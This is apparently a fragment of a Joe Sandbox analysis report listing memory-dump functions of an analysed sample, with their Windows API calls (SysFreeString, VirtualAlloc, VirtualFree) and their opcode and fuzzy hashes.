                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2525500382-0
                                                                                                                              • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                              • Instruction ID: b4833b6671f65ecead18600a33e5a1964163a79c59501dc7c34b1d1ae95d1035
                                                                                                                              • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                              • Instruction Fuzzy Hash: 59B0123C2482021AFE1013610D10B3210AC8B60387FB400DD9E29DC0C4FF00C1008832
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02BC4C03
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3341692771-0
                                                                                                                              • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                              • Instruction ID: 1c93081567378a8302c9b55ab6c48e396bc0ffc36120f28d1fdfec3ee0027b4c
                                                                                                                              • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                              • Instruction Fuzzy Hash: 24A022EC0003030A8F0B232C80A002B2033BFE03003FAC0EC00002E028CF3AC000AC30
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02BC16A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 3d54eb0cd02876da3bdae10ab14431b38b4d65407396c1b4a55fc86c32f0f7bf
                                                                                                                              • Instruction ID: 384680dbdd6076fc07c2c6f613218b64fc7f810850634b605ce5760218fcfd71
                                                                                                                              • Opcode Fuzzy Hash: 3d54eb0cd02876da3bdae10ab14431b38b4d65407396c1b4a55fc86c32f0f7bf
                                                                                                                              • Instruction Fuzzy Hash: D4F0B4B2B507956BD7209F5E9C80782BB94FB10714F15427EF94CAB341DB70A8148FD4
                                                                                                                              APIs
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02BC1704
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1263568516-0
                                                                                                                              • Opcode ID: 1e738411f6b81446eb567fddd29c527c670716050f4d422adc8ac2d33bac774d
                                                                                                                              • Instruction ID: 0f570e45b86776ce2ea6f7aeaeeb2e5f2edb6d75026eb896923db2460bb1c538
                                                                                                                              • Opcode Fuzzy Hash: 1e738411f6b81446eb567fddd29c527c670716050f4d422adc8ac2d33bac774d
                                                                                                                              • Instruction Fuzzy Hash: 48E026B53203006FE7205E3D4C407127BC8EB44730F3446BEF149EB2C2C2A0D8008B60